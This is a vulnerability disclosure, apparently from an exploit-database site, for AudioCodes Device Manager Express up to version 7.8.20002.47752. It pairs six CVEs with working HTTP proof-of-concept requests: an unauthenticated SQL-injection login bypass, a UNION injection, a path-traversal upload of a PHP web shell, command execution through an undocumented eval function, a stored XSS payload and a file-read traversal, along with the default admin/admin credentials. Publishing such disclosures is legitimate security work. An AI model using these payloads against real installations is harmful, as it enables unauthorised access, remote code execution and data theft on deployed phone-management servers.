Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal

2023.02.24
Credit: Eric Flokstra
Risk: High
Local: No
Remote: Yes
CVE: CVE-2022-24630 | CVE-2022-24632 | CVE-2022-24627 | CVE-2022-24628 | CVE-2022-24629 | CVE-2022-24631
CWE: CWE-89
CWE-79
CWE-22

# Product Name: Device Manager Express # Vendor Homepage: https://www.audiocodes.com # Software Link: https://www.audiocodes.com/solutions-products/products/management-products-solutions/device-manager # Version: <= 7.8.20002.47752 # Tested on: Windows 10 / Server 2019 # Default credentials: admin/admin # CVE-2022-24627, CVE-2022-24628, CVE-2022-24629, CVE-2022-24630, CVE-2022-24631, CVE-2022-24632 # Exploit: https://github.com/00xEF/Audiocodes-Device-Manager-Express AudioCodes' Device Manager Express features a user interface that enables enterprise network administrators to set up, configure and update up to 500 400HD Series IP phones in globally distributed corporations. ---------------- CVE-2022-24627: An unauthenticated SQL injection exists in the p parameter of the login form. ---------------- POST /admin/AudioCodes_files/process_login.php HTTP/1.1 Host: 10.11.12.13 ".." omitted User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Content-Type: application/x-www-form-urlencoded username=admin&password=&domain=&p=%5C%27or+1%3D1%23 ---------------- CVE-2022-24628: An authenticated SQL injection exists in the id parameter of IPPhoneFirmwareEdit.php ---------------- /admin/AudioCodes_files/IPPhoneFirmwareEdit.php?action=download&id=-1338'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- ---------------- CVE-2022-24629: A remote code execution vulnerability exists via path traversal in the dir parameter of the file upload functionality . ---------------- POST /admin/AudioCodes_files/BrowseFiles.php?type= HTTP/1.1 Host: 10.11.12.13 ".." omitted User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) -----------------------------119140522224988540294045582807 Content-Disposition: form-data; name="dir" C:/audiocodes/express/WebAdmin/admin/AudioCodes_files/ajax/ -----------------------------119140522224988540294045582807 Content-Disposition: form-data; name="type" -----------------------------119140522224988540294045582807 Content-Disposition: form-data; name="myfile"; filename="ajaxJabra.php" Content-Type: application/x-php <?php echo shell_exec($_GET['x']); ?> -----------------------------119140522224988540294045582807 Content-Disposition: form-data; name="Submit" Upload -----------------------------119140522224988540294045582807-- ---------------- CVE-2022-24630: A remote command execution exists in an undocumented eval function in BrowseFiles.php ---------------- POST /admin/AudioCodes_files/BrowseFiles.php?cmd=ssh HTTP/1.1 Host: 10.11.12.13 ".." omitted User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) ssh_command=dir+C: ---------------- CVE-2022-24631: A Persistent Cross-Site Scripting exists in the desc parameter in ajaxTenants.php ---------------- POST /admin/AudioCodes_files/ajax/ajaxTenants.php HTTP/1.1 Host: 10.11.12.13 ".." omitted User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) action=save&id=1&name=Default&desc=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&subnet=&isdefault=true ---------------- CVE-2022-24632: A path traversal vulnerability exists in the view parameter of the file download functionality in BrowseFiles.php ---------------- /admin/AudioCodes_files/BrowseFiles.php?view=C:/windows/win.ini


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top